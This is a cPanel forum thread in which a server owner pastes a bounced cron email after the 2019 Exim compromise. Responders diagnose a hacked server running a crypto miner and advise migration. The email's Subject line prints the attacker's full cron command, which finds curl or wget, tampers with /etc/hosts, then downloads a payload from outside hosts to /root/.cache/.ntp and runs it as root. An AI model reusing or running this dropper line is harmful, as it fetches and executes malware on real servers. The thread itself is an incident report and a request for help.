Mail delivery failed: returning message to sender

[slideloft]

Hi .

I upgraded my cpanel after the Exim exploit and ever since then i have been getting emails in queue that contains the following .

--1561246082-eximdsn-632408078
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

[email protected]
root cannot accept local mail deliveries

--1561246082-eximdsn-632408078
Content-type: message/delivery-status

Reporting-MTA: dns; server.example.com

Action: failed
Final-Recipient: rfc822;[email protected]
Status: 5.0.0

--1561246082-eximdsn-632408078
Content-type: text/rfc822-headers

Return-path: <[email protected]>
Received: from root by mega.example.com with local (Exim 4.92)
(envelope-from <[email protected]>)
id 1hepQP-00074l-Uw
for [email protected]; Sat, 22 Jun 2019 23:28:02 +0000
From: [email protected] (Cron Daemon)
To: [email protected]
Subject: Cron <[email protected]> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <[email protected]>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
Content-Type: text/plain; charset=ANSI_X3.4-1968
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <[email protected]>
Date: Sat, 22 Jun 2019 23:28:01 +0000
X-Exim-DSN-Information: Due to administrative limits only headers are returned


--1561246082-eximdsn-632408078--

How can i fix this . i am getting mails every 2 minute.

 

[GOT]

It looks to me like your hostname is not a fqdn . Go to whm and reset your hostname. This is a common problem with openvz vms which I'd bet is what you have.

Only your host can fix the issue with the changing hostname every time you boot..

 

[Infopro]

Checking google for just a snip of your post:

/root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/

...and I found this link. Worth looking at this closer I think.
What does this entry in my server's crontab do?

In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.

I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link.


If you're unsure what to do here, you might want to look into hiring someone that can help you with this:
System Administration Services | cPanel Forums

 

[cPanelLauren]

1. the error here:

[email protected]
root cannot accept local mail deliveries

Indicates that you've not set the address for root's mail to be forwarded to in WHM>>Server Contacts>>Edit System Mail Preferences.

2. And by far the most important:

That cron output is associated with the exim compromise. If you'd like for us to investigate to identify if your server is root compromised we would be happy to. I also want to point out that there is no safe way to clean a root level compromise, if it is found that you have been affected (which I am almost certain you have) you will need to migrate. We also offer migrations for this.


If you'd like cPanel's support to assist you can open a ticket using the link in my signature. Once open please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.


Thanks!